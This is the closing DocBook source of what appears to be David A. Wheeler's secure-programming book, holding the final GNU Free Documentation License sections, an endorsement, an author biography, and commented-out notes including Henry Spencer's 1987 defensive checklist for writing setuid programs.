<listitem>
|
||
<para>
|
||
Do not retitle any existing section as "Endorsements" or to
|
||
conflict in title with any <link
|
||
linkend="fdl-invariant">Invariant Section</link>.
|
||
</para>
|
||
</listitem>
|
||
</orderedlist>
|
||
|
||
<para>
|
||
If the <link linkend="fdl-modified">Modified Version</link> includes
|
||
new front-matter sections or appendices that qualify as <link
|
||
linkend="fdl-secondary">Secondary Sections</link> and contain no
|
||
material copied from the Document, you may at your option designate
|
||
some or all of these sections as invariant. To do this, add their
|
||
titles to the list of <link linkend="fdl-invariant">Invariant
|
||
Sections</link> in the <link linkend="fdl-modified">Modified
|
||
Version's</link> license notice. These titles must be distinct from
|
||
any other section titles.
|
||
</para>
|
||
|
||
<para>
|
||
You may add a section entitled "Endorsements", provided it contains
|
||
nothing but endorsements of your <link linkend="fdl-modified">Modified
|
||
Version</link> by various parties--for example, statements of peer
|
||
review or that the text has been approved by an organization as the
|
||
authoritative definition of a standard.
|
||
</para>
|
||
|
||
<para>
|
||
You may add a passage of up to five words as a <link
|
||
linkend="fdl-cover-texts">Front-Cover Text</link>, and a passage of up
|
||
to 25 words as a <link linkend="fdl-cover-texts">Back-Cover
|
||
Text</link>, to the end of the list of <link
|
||
linkend="fdl-cover-texts">Cover Texts</link> in the <link
|
||
linkend="fdl-modified">Modified Version</link>. Only one passage of
|
||
<link linkend="fdl-cover-texts">Front-Cover Text</link> and one of
|
||
<link linkend="fdl-cover-texts">Back-Cover Text</link> may be added by
|
||
(or through arrangements made by) any one entity. If the <link
|
||
linkend="fdl-document">Document</link> already includes a cover text
|
||
for the same cover, previously added by you or by arrangement made by
|
||
the same entity you are acting on behalf of, you may not add another;
|
||
but you may replace the old one, on explicit permission from the
|
||
previous publisher that added the old one.
|
||
</para>
|
||
|
||
<para>
|
||
The author(s) and publisher(s) of the <link
|
||
linkend="fdl-document">Document</link> do not by this License give
|
||
permission to use their names for publicity for or to assert or imply
|
||
endorsement of any <link linkend="fdl-modified">Modified Version
|
||
</link>.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry id="fdl-section5">
|
||
<term>5. COMBINING DOCUMENTS</term>
|
||
<listitem>
|
||
<para>
|
||
You may combine the <link linkend="fdl-document">Document</link> with
|
||
other documents released under this License, under the terms defined
|
||
in <link linkend="fdl-section4">section 4</link> above for modified
|
||
versions, provided that you include in the combination all of the
|
||
<link linkend="fdl-invariant">Invariant Sections</link> of all of the
|
||
original documents, unmodified, and list them all as <link
|
||
linkend="fdl-invariant">Invariant Sections</link> of your combined
|
||
work in its license notice.
|
||
</para>
|
||
|
||
<para>
|
||
The combined work need only contain one copy of this License, and
|
||
multiple identical <link linkend="fdl-invariant">Invariant
|
||
Sections</link> may be replaced with a single copy. If there are
|
||
multiple <link linkend="fdl-invariant"> Invariant Sections</link> with
|
||
the same name but different contents, make the title of each such
|
||
section unique by adding at the end of it, in parentheses, the name of
|
||
the original author or publisher of that section if known, or else a
|
||
unique number. Make the same adjustment to the section titles in the
|
||
list of <link linkend="fdl-invariant">Invariant Sections</link> in the
|
||
license notice of the combined work.
|
||
</para>
|
||
|
||
<para>
|
||
In the combination, you must combine any sections entitled "History"
|
||
in the various original documents, forming one section entitled
|
||
"History"; likewise combine any sections entitled "Acknowledgements",
|
||
and any sections entitled "Dedications". You must delete all sections
|
||
entitled "Endorsements."
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry id="fdl-section6">
|
||
<term>6. COLLECTIONS OF DOCUMENTS</term>
|
||
<listitem>
|
||
<para>
|
||
You may make a collection consisting of the <link
|
||
linkend="fdl-document">Document</link> and other documents released
|
||
under this License, and replace the individual copies of this License
|
||
in the various documents with a single copy that is included in the
|
||
collection, provided that you follow the rules of this License for
|
||
verbatim copying of each of the documents in all other respects.
|
||
</para>
|
||
|
||
<para>
|
||
You may extract a single document from such a collection, and
|
||
distribute it individually under this License, provided you insert a
|
||
copy of this License into the extracted document, and follow this
|
||
License in all other respects regarding verbatim copying of that
|
||
document.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry id="fdl-section7">
|
||
<term>7. AGGREGATION WITH INDEPENDENT WORKS</term>
|
||
<listitem>
|
||
<para>
|
||
A compilation of the <link linkend="fdl-document">Document</link> or
|
||
its derivatives with other separate and independent documents or
|
||
works, in or on a volume of a storage or distribution medium, does not
|
||
as a whole count as a <link linkend="fdl-modified">Modified
|
||
Version</link> of the <link linkend="fdl-document"> Document</link>,
|
||
provided no compilation copyright is claimed for the compilation.
|
||
Such a compilation is called an "aggregate", and this License does not
|
||
apply to the other self-contained works thus compiled with the <link
|
||
linkend="fdl-document">Document</link> , on account of their being
|
||
thus compiled, if they are not themselves derivative works of the
|
||
<link linkend="fdl-document">Document</link>. If the <link
|
||
linkend="fdl-cover-texts">Cover Text</link> requirement of <link
|
||
linkend="fdl-section3">section 3</link> is applicable to these copies
|
||
of the <link linkend="fdl-document">Document</link>, then if the <link
|
||
linkend="fdl-document">Document</link> is less than one quarter of the
|
||
entire aggregate, the <link linkend="fdl-document">Document's</link>
|
||
<link linkend="fdl-cover-texts">Cover Texts</link> may be placed on
|
||
covers that surround only the <link
|
||
linkend="fdl-document">Document</link> within the aggregate. Otherwise
|
||
they must appear on covers around the whole aggregate.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry id="fdl-section8">
|
||
<term>8. TRANSLATION</term>
|
||
<listitem>
|
||
<para>
|
||
Translation is considered a kind of modification, so you may
|
||
distribute translations of the <link
|
||
linkend="fdl-document">Document</link> under the terms of <link
|
||
linkend="fdl-section4">section 4</link>. Replacing <link
|
||
linkend="fdl-invariant"> Invariant Sections</link> with translations
|
||
requires special permission from their copyright holders, but you may
|
||
include translations of some or all <link
|
||
linkend="fdl-invariant">Invariant Sections</link> in addition to the
|
||
original versions of these <link linkend="fdl-invariant">Invariant
|
||
Sections</link>. You may include a translation of this License
|
||
provided that you also include the original English version of this
|
||
License. In case of a disagreement between the translation and the
|
||
original English version of this License, the original English version
|
||
will prevail.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry id="fdl-section9">
|
||
<term>9. TERMINATION</term>
|
||
<listitem>
|
||
<para>
|
||
You may not copy, modify, sublicense, or distribute the <link
|
||
linkend="fdl-document">Document</link> except as expressly provided
|
||
for under this License. Any other attempt to copy, modify, sublicense
|
||
or distribute the <link linkend="fdl-document">Document</link> is
|
||
void, and will automatically terminate your rights under this
|
||
License. However, parties who have received copies, or rights, from
|
||
you under this License will not have their licenses terminated so long
|
||
as such parties remain in full compliance.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry id="fdl-section10">
|
||
<term>10. FUTURE REVISIONS OF THIS LICENSE</term>
|
||
<listitem>
|
||
<para>
|
||
The <ulink type="http" url="http://www.gnu.org/fsf/fsf.html">Free
|
||
Software Foundation</ulink> may publish new, revised versions of the
|
||
GNU Free Documentation License from time to time. Such new versions
|
||
will be similar in spirit to the present version, but may differ in
|
||
detail to address new problems or concerns. See <ulink type="http"
|
||
url="http://www.gnu.org/copyleft">http://www.gnu.org/copyleft/</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
Each version of the License is given a distinguishing version
|
||
number. If the <link linkend="fdl-document">Document</link> specifies
|
||
that a particular numbered version of this License "or any later
|
||
version" applies to it, you have the option of following the terms and
|
||
conditions either of that specified version or of any later version
|
||
that has been published (not as a draft) by the Free Software
|
||
Foundation. If the <link linkend="fdl-document">Document</link> does
|
||
not specify a version number of this License, you may choose any
|
||
version ever published (not as a draft) by the Free Software
|
||
Foundation.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry id="fdl-using">
|
||
<term>Addendum</term>
|
||
<listitem>
|
||
<para>
|
||
To use this License in a document you have written, include a copy of
|
||
the License in the document and put the following copyright and
|
||
license notices just after the title page:
|
||
</para>
|
||
|
||
<para>
|
||
Copyright © YEAR YOUR NAME.
|
||
</para>
|
||
|
||
<para>
|
||
Permission is granted to copy, distribute and/or modify this document
|
||
under the terms of the GNU Free Documentation License, Version 1.1 or
|
||
any later version published by the Free Software Foundation; with the
|
||
<link linkend="fdl-invariant">Invariant Sections</link> being LIST
|
||
THEIR TITLES, with the <link linkend="fdl-cover-texts">Front-Cover
|
||
Texts</link> being LIST, and with the <link
|
||
linkend="fdl-cover-texts">Back-Cover Texts</link> being LIST. A copy
|
||
of the license is included in the section entitled <quote>GNU Free
|
||
Documentation License</quote>.
|
||
</para>
|
||
|
||
<para>
|
||
If you have no <link linkend="fdl-invariant">Invariant
|
||
Sections</link>, write "with no Invariant Sections" instead of saying
|
||
which ones are invariant. If you have no <link
|
||
linkend="fdl-cover-texts">Front-Cover Texts</link>, write "no
|
||
Front-Cover Texts" instead of "Front-Cover Texts being LIST"; likewise
|
||
for <link linkend="fdl-cover-texts">Back-Cover Texts</link>.
|
||
</para>
|
||
|
||
<para>
|
||
If your document contains nontrivial examples of program code, we
|
||
recommend releasing these examples in parallel under your choice of
|
||
free software license, such as the <ulink type="http"
|
||
url="http://www.gnu.org/copyleft/gpl.html"> GNU General Public
|
||
License</ulink>, to permit their use in free software.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
</variablelist>
|
||
</appendix>
|
||
|
||
<appendix id="endorsements">
|
||
<title>Endorsements</title>
|
||
<para>
|
||
This version of the document is endorsed by the
|
||
original author, David A. Wheeler, as a document that
|
||
should improve the security of programs,
|
||
when applied correctly.
|
||
Note that no book, including this one, can guarantee that a developer
|
||
who follows its guidelines will produce perfectly secure software.
|
||
Modifications (including translations) must remove this appendix
|
||
per the license agreement included above.
|
||
</para>
|
||
</appendix>
|
||
|
||
|
||
<appendix id="about-author">
|
||
<title>About the Author</title>
|
||
|
||
<mediaobject>
|
||
<imageobject>
|
||
<imagedata fileref="images/dwheeler2003b.jpg" format="jpg">
|
||
</imageobject>
|
||
<caption>
|
||
<para>David A. Wheeler</para>
|
||
</caption>
|
||
</mediaobject>
|
||
|
||
<para>
|
||
David A. Wheeler is an expert in computer security and
|
||
has long specialized in development techniques for large and
|
||
high-risk software systems.
|
||
He has been involved in software development
|
||
since the mid-1970s,
|
||
and been involved with Unix and computer security since the early 1980s.
|
||
His areas of knowledge include computer security,
|
||
software safety, vulnerability analysis, inspections, Internet technologies,
|
||
software-related standards (including POSIX),
|
||
real-time software development techniques,
|
||
and numerous computer languages
|
||
(including Ada, C, C++, Perl, Python, and Java).
|
||
</para>
|
||
|
||
<para>
|
||
Mr. Wheeler is co-author and lead editor of the IEEE book
|
||
<emphasis>Software Inspection: An Industry Best Practice</emphasis>,
|
||
author of the book
|
||
<emphasis>Ada95: The Lovelace Tutorial</emphasis>,
|
||
and co-author of the
|
||
<emphasis>GNOME User's Guide</emphasis>.
|
||
He is also the author of many smaller papers and articles, including the
|
||
Linux <emphasis>Program Library HOWTO</emphasis>.
|
||
</para>
|
||
|
||
<para>
|
||
Mr. Wheeler hopes that, by making this document available, other
|
||
developers will make their software more secure.
|
||
You can reach him by email at dwheeler@dwheeler.com (no spam please),
|
||
and you can also see his web site at
|
||
<ulink url="http://www.dwheeler.com">http://www.dwheeler.com</ulink>.
|
||
</para>
|
||
</appendix>
|
||
|
||
|
||
<!--Miscellaneous quotes:
|
||
Do not deprive the alien or the fatherless of justice,
|
||
or take the cloak of the widow as a pledge.
|
||
Deuteronomy 24:17
|
||
|
||
|
||
Words from a wise man's mouth are gracious, but a fool is consumed
|
||
by his own lips. At the beginning his words are folly;
|
||
at the end they are wicked madness
|
||
Ecclesiastes 10:12-13
|
||
|
||
|
||
|
||
I took the deed of purchase - the sealed copy containing the
|
||
terms and conditions, as well as the unsealed copy -
|
||
Jeremiah 32:11 (English-NIV)
|
||
|
||
|
||
Esther had not revealed her nationality and family background,
|
||
because Mordecai had forbidden her to do so.
|
||
Esther 2:10
|
||
|
||
|
||
When the righteous thrive, the people rejoice;
|
||
when the wicked rule, the people groan.
|
||
Proverbs 29:2
|
||
|
||
When words are many, sin is not absent, but he who holds his tongue is wise.
|
||
Proverbs 10:19
|
||
|
||
|
||
Reckless words pierce like a sword,
|
||
but the tongue of the wise brings healing.
|
||
Proverbs 12:18
|
||
|
||
|
||
"Go and inquire of the LORD for me and for the people and for all Judah
|
||
about what is written in this book that has been found.
|
||
Great is the LORD's anger that burns against us because our fathers
|
||
have not obeyed the words of this book; they have not acted in
|
||
accordance with all that is written there concerning us."
|
||
2 Kings 22:13
|
||
|
||
Only be careful, and watch yourselves closely so that you do not forget
|
||
the things your eyes have seen or let them slip from your heart
|
||
as long as you live. Teach them to your children and to their
|
||
children after them.
|
||
Deuteronomy 4:9
|
||
|
||
You prepare a table before me
|
||
in the presence of my enemies.
|
||
You anoint my head with oil;
|
||
my cup overflows. Psalm 23:5 (NIV)
|
||
|
||
An enemy will overrun the land; he will pull down your strongholds and
|
||
plunder your fortresses."
|
||
Amos 3:11
|
||
|
||
But my brothers are as undependable as intermittent streams,
|
||
as the streams that overflow
|
||
Job 6:15
|
||
|
||
???: http://soledad.cs.ucdavis.edu/
|
||
describes Linux BSM, an auditing project.
|
||
|
||
???: Could add a discussion of legal issues and requirements,
|
||
U.S. and internationally.
|
||
|
||
??? Discuss formal proofs.
|
||
|
||
|
||
Per http://www.tldp.org/LDP/LDP-Author-Guide/images.html,
|
||
the template for images is:
|
||
<figure>
|
||
<title>LyX screen shot</title>
|
||
<mediaobject>
|
||
<imageobject>
|
||
<imagedata fileref="lyx_screenshot.eps" format="eps">
|
||
</imageobject>
|
||
<imageobject>
|
||
<imagedata fileref="lyx_screenshot.jpg" format="jpg">
|
||
</imageobject>
|
||
<textobject>
|
||
<phrase>Screen shot of the LyX document processing program</phrase>
|
||
</textobject>
|
||
</mediaobject>
|
||
</figure>
|
||
|
||
-->
|
||
|
||
<!--
|
||
Here is Henry Spenser's 1987 man page on writing setuid programs,
|
||
reposted in the Bugtraq of April 25, 2002; sometime I intend to
|
||
go back through this and make sure I haven't missed anything:
|
||
|
||
|
||
...TH SETUID 7 local
|
||
...DA 21 Feb 1987
|
||
...SH NAME
|
||
setuid \- checklist for security of setuid programs
|
||
...SH DESCRIPTION
|
||
Writing a secure setuid (or setgid) program is tricky.
|
||
There are a number of possible ways of subverting such a program.
|
||
The most conspicuous security holes occur when a setuid program is
|
||
not sufficiently careful to avoid giving away access to resources
|
||
it legitimately has the use of.
|
||
Most of the other attacks are basically a matter of altering the program's
|
||
environment in unexpected ways and hoping it will fail in some
|
||
security-breaching manner.
|
||
There are generally three categories of environment manipulation:
|
||
supplying a legal but unexpected environment that may cause the
|
||
program to directly do something insecure,
|
||
arranging for error conditions that the program may not handle correctly,
|
||
and the specialized subcategory of giving the program inadequate
|
||
resources in hopes that it won't respond properly.
|
||
...PP
|
||
The following are general considerations of security when writing
|
||
a setuid program.
|
||
...de P
|
||
...nr x \\w'\(sq'u+1n
|
||
...TP \\nxu
|
||
\(sq
|
||
....
|
||
...P
|
||
The program should run with the weakest userid possible, preferably
|
||
one used only by itself.
|
||
A security hole in a setuid program running with a highly-privileged
|
||
userid can compromise an entire system.
|
||
Security-critical programs like
|
||
...IR passwd (1)
|
||
should always have private userids, to minimize possible damage
|
||
from penetrations elsewhere.
|
||
...P
|
||
The result of
|
||
...I getlogin
|
||
or
|
||
...I ttyname
|
||
may be wrong if the descriptors have been meddled with.
|
||
There is
|
||
...I no
|
||
foolproof way to determine the controlling terminal
|
||
or the login name (as opposed to uid) on V7.
|
||
...P
|
||
On some systems (not ours), the setuid bit may not be honored if
|
||
the program is run by
|
||
...IR root ,
|
||
so the program may find itself running as
|
||
...IR root .
|
||
...P
|
||
Programs that attempt to use
|
||
...I creat
|
||
for locking can foul up when run by
|
||
...IR root ;
|
||
use of
|
||
...I link
|
||
is preferred when implementing locking.
|
||
Using
|
||
...I chmod
|
||
for locking is an obvious disaster.
|
||
...P
|
||
Breaking an existing lock is very dangerous; the breakdown of a locking
|
||
protocol may be symptomatic of far worse problems.
|
||
Doing so on the basis of the lock being `old' is sometimes necessary,
|
||
but programs can run for surprising lengths of time on heavily-loaded
|
||
systems.
|
||
...P
|
||
Care must be taken that user requests for i/o are checked for
|
||
permissions using the user's permissions, not the program's.
|
||
Use of
|
||
...I access
|
||
is recommended.
|
||
...P
|
||
Programs executed at user request (e.g. shell escapes) must
|
||
not receive the setuid program's permissions;
|
||
use of daughter processes and
|
||
...I setuid(getuid())
|
||
plus
|
||
...I setgid(getgid())
|
||
after
|
||
...I fork
|
||
but before
|
||
...I exec
|
||
is vital.
|
||
...P
|
||
Similarly, programs executed at user request must not receive other
|
||
sensitive resources, notably file descriptors.
|
||
Use of
|
||
...IR closeall (3)
|
||
or close-on-exec arrangements,
|
||
on systems which have them,
|
||
is recommended.
|
||
...P
|
||
Programs activated by one user but handling traffic on behalf of
|
||
others (e.g. daemons) should avoid doing
|
||
...IR setuid(getuid())
|
||
or
|
||
...IR setgid(getgid()) ,
|
||
since the original invoker's identity is almost certainly inappropriate.
|
||
On systems which permit it, use of
|
||
...I setuid(geteuid())
|
||
and
|
||
...I setgid(getegid())
|
||
is recommended when performing work on behalf of the system as
|
||
opposed to a specific user.
|
||
...P
|
||
There are inherent permission problems when a setuid program executes
|
||
another setuid program,
|
||
since the permissions are not additive.
|
||
Care should be taken that created files are not owned by the wrong person.
|
||
Use of
|
||
...I setuid(geteuid())
|
||
and its gid counterpart can help, if the system allows them.
|
||
...P
|
||
Care should be taken that newly-created files do not have the wrong
|
||
permission or ownership even momentarily.
|
||
Permissions should be arranged by using
|
||
...I umask
|
||
in advance, rather than by creating the file wide-open and then using
|
||
...IR chmod .
|
||
Ownership can get sticky due to the limitations of the setuid concept,
|
||
although using a daughter process connected by a pipe can help.
|
||
...P
|
||
Setuid programs should be especially careful about error checking,
|
||
and the normal response to a strange situation should be termination,
|
||
rather than an attempt to carry on.
|
||
...PP
|
||
The following are ways in which the program may be induced to carelessly
|
||
give away its special privileges.
|
||
...P
|
||
The directory the program is started in, or directories it may
|
||
plausibly
|
||
...I chdir
|
||
to, may contain programs with the same names as system programs,
|
||
placed there in hopes that the program will activate a shell with
|
||
a permissive
|
||
...B PATH
|
||
setting.
|
||
...B PATH
|
||
should \fIalways\fR be standardized before invoking a shell
|
||
(either directly or via
|
||
...I popen
|
||
or
|
||
...IR execvp/execlp ).
|
||
...P
|
||
Similarly, a bizarre
|
||
...B IFS
|
||
setting may alter the interpretation of a shell command in really
|
||
strange ways, possibly causing a user-supplied program to be invoked.
|
||
...B IFS
|
||
too should always be standardized before invoking a shell.
|
||
(Our shell does this automatically.)
|
||
...P
|
||
Environment variables in general cannot be trusted.
|
||
Their contents should never be taken for granted.
|
||
...P
|
||
Setuid shell files (on systems which implement such) simply cannot
|
||
cope adequately with some of these problems.
|
||
They also have some nasty problems like trying to run a
|
||
...I \&.profile
|
||
when run under a suitable name.
|
||
They are terminally insecure, and must be avoided.
|
||
...P
|
||
Relying on the contents of files placed in publically-writeable
|
||
directories, such as
|
||
...IR /tmp ,
|
||
is a nearly-incurable security problem.
|
||
Setuid programs should avoid using
|
||
...I /tmp
|
||
entirely, if humanly possible.
|
||
The sticky-directories modification (sticky bit on for a directory means
|
||
only owner of a file can remove it) (we have this feature) helps,
|
||
but is not a complete solution.
|
||
...P
|
||
A related problem is that
|
||
spool directories, holding information that the program will trust
|
||
later, must never be publically writeable even if the files in the
|
||
directory are protected.
|
||
Among other sinister manipulations that can be performed, note that
|
||
on many Unixes (not ours), a core dump of a setuid program is owned
|
||
by the program's owner and not by the user running it.
|
||
...PP
|
||
The following are unusual but possible error conditions that the
|
||
program should cope with properly (resource-exhaustion questions
|
||
are considered separately, see below).
|
||
...P
|
||
The value of
|
||
...I argc
|
||
might be 0.
|
||
...P
|
||
The setting of the
|
||
...I umask
|
||
might not be sensible.
|
||
In any case, it should be standardized when creating files
|
||
not intended to be owned by the user.
|
||
...P
|
||
One or more of the standard descriptors might be closed, so that
|
||
an opened file might get (say) descriptor 1, causing chaos if the
|
||
program tries to do a
|
||
...IR printf .
|
||
...P
|
||
The current directory (or any of its parents)
|
||
may be unreadable and unsearchable.
|
||
On many systems
|
||
...IR pwd (1)
|
||
does not run setuid-root,
|
||
so it can fail under such conditions.
|
||
...P
|
||
Descriptors shared by other processes (i.e., any that are open
|
||
on startup) may be manipulated in strange ways by said processes.
|
||
...P
|
||
The standard descriptors may refer to a terminal which has a bizarre
|
||
mode setting, or which cannot be opened again,
|
||
or which gives end-of-file on any read attempt, or which cannot
|
||
be read or written successfully.
|
||
...P
|
||
The process may be hit by interrupt, quit, hangup, or broken-pipe signals,
|
||
singly or in fast succession.
|
||
The user may deliberately exploit the race conditions inherent
|
||
in catching signals;
|
||
ignoring signals is safe, but catching them is not.
|
||
...P
|
||
Although non-keyboard signals cannot be sent by ordinary users in V7,
|
||
they may perhaps be sent by the system authorities (e.g. to
|
||
indicate that the system is about to shut down),
|
||
so the possibility cannot be ignored.
|
||
...P
|
||
On some systems (not ours)
|
||
there may be an
|
||
...I alarm
|
||
signal pending on startup.
|
||
...P
|
||
The program may have children it did not create.
|
||
This is normal when the process is part of a pipeline.
|
||
...P
|
||
In some non-V7 systems, users can change the ownerships of their files.
|
||
Setuid programs should avoid trusting the owner identification of a file.
|
||
...P
|
||
User-supplied arguments and input data
|
||
...I must
|
||
be checked meticulously.
|
||
Overly-long input stored in an array without proper bound checking
|
||
can easily breach security.
|
||
When software depends on a file being in a specific format, user-supplied
|
||
data should never be inserted into the file without being checked first.
|
||
Meticulous checking includes allowing for the possibility of non-ASCII
|
||
characters.
|
||
...P
|
||
Temporary files left in public directories
|
||
like
|
||
...I /tmp
|
||
might vanish at inconvenient times.
|
||
...PP
|
||
The following are resource-exhaustion possibilities that the
|
||
program should respond properly to.
|
||
...P
|
||
The user might have used up all of his allowed processes, so
|
||
any attempt to create a new one (via
|
||
...I fork
|
||
or
|
||
...IR popen )
|
||
will fail.
|
||
...P
|
||
There might be many files open, exhausting the supply of descriptors.
|
||
Running
|
||
...IR closeall (3),
|
||
on systems which have it,
|
||
is recommended.
|
||
...P
|
||
There might be many arguments.
|
||
...P
|
||
The arguments and the environment together might occupy a great deal
|
||
of space.
|
||
...PP
|
||
Systems which impose other resource limitations can open setuid
|
||
programs to similar resource-exhaustion attacks.
|
||
...PP
|
||
Setuid programs which execute ordinary programs without reducing
|
||
authority pass all the above problems on to such unprepared children.
|
||
Standardizing the execution environment is only a partial solution.
|
||
...SH SEE ALSO
|
||
closeall(3), standard(3)
|
||
...SH HISTORY
|
||
Locally written, although based on outside contributions.
|
||
...SH AUTHOR
|
||
Henry Spencer <henry@zoo.toronto.edu> ...SH BUGS
|
||
The list really is rather long...
|
||
and probably incomplete.
|
||
...PP
|
||
Neither the author nor the University of Toronto accepts any responsibility
|
||
whatever for the use or non-use of this information.
|
||
-->
|
||
|
||
</book>
|
||
|